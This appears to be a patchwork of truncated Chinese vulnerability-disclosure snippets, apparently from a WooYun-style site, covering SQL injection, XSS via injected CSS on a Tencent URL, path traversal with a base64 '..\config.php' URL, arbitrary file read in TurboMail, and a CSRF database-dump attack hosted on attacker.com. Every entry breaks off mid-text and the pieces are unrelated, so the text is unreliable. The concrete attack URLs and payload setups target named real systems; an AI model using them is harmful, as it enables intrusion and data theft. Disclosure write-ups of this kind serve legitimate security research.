v3.4 20140808
include/common.fun.php
function updatetable($tablename, $setsqlarr, $wheresqlarr, $silent=0) {
global $db;
$setsql = $comma = '';
foreach ($setsqlarr as $set_key => $set_value) {
if(is_array($set_value)) { //如果是数组就取第一个元素
$setsql .= $comma.'`'.$se...
腾讯某处可插入第三方css,可引起XSS!
http://pt.3g.qq.com/s?aid=touchLogin&bid_code=qqbuyLogin&css=http%3A%2F%2Fapp.t.qq.com%2Fdownload.php%3Fkey%3D8e1b1ba1-a9de-438a-9f66-a073d7e60da0%26name%3Dhello.css&go_url=http%3A%2F%2Fparty.wanggou.com%2Ftws64%2Fm%2Fh5v1%2FcpLogin%3...
你给的测试站点,看源码你是过滤../但是你忘了window支持..\
http://guf521656.h163.92hezu.org/index.php?controller=down&file=L3VwbG9hZC9cLi5cY29uZmlnLnBocA==
修复方案:
直接过滤/和\就行了
上一篇: 用友人力资源管理软件(e-HR)另一处SQL注入漏洞
下一...
TurboMail邮件系统处理日志文件时未对文件路径进行判断,导致可读取服务器上的任意文件。
邮件后台管理进行“WEB日志查看”时存在任意文件读取漏洞。
漏洞代码位于TomcatLogAjax.class,其中getLog函数读取web服务器日志文件的源代码实现如下:
publicstatic void getLog(HttpServletRequest request, Htt...
上一个注入由于不清楚到底是啥版本,只能让厂商自己去查了,赶脚挺愧疚的。 这次终于不用纠结版本问题了,因为通杀。。。
1.漏洞出在[重置密码]功能这,密码找回输入用户处由于未进行过滤导致SQL注入漏洞。
2.漏洞文件http://x.x.x.x/hrss/rm/ResetPwd.jsp?
3. 抓包...
不好好的通过修改造成漏洞的代码 而是通过修改过滤函数。 现在的过滤函数, 虽然我是绕不过去了。 但是还是能找到几处能出数据的。 之前未通过,这次两个打个包来。
P.S:这很不好意思 之前测试demo的时候 因为有个是个update的点 忘记加where限制条件了 导致给某处全部都出数据了。。。。。 不只应该修改过...
后台管理界面因为过滤不严格导致SQL注入漏洞,可以使权限较低的管理员取得较高权限,以及获取并修改超级管理员的用户名密码。
存在问题的代码,admin_save.php 59-101行,SQL语句中的$id存在注入
else if($action == 'update')
{
//创始人账号不允许更改状态
if($id == 1 and ($checkadmin !=...
重要功能未进行csrf token验证导致可被脱裤
详细说明:
后台管理中的数据备份功能未进行csrf token验证。
攻击者制作内容如下的csrf.php并放到attacker.com下面:
<?phpfile_put_contents("test.txt", " IP:".$_SERVER["REMOTE_ADDR"], FILE_APPEND); file_put_contents("test.txt", " Time:".date("...
rtV6.0.14.07.07 UTF8
详细说明:
看了大牛们提交的 WooYun: ESPCMS最新 V5.8.14.03.03 UTF8 正式版暴力注入
下了最新版来看看,发现 加密函数 还是老样子啊- -
不过 ,查询换成 了 id 而不是 username了,
但是 id 是 intval的。
function member_cookieview($keyword = false) {$retrunstr = array();$...
不好好修改漏洞代码 而是修改过滤函数 虽然你们这过滤函数我绕不过。
但是过滤的还不是很完善, 还能出数据。
还是在修改过滤函数的同时好好修改下产生漏洞的代码把。
详细说明:
看过滤函数
function remove_xss($string) { $string = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $str...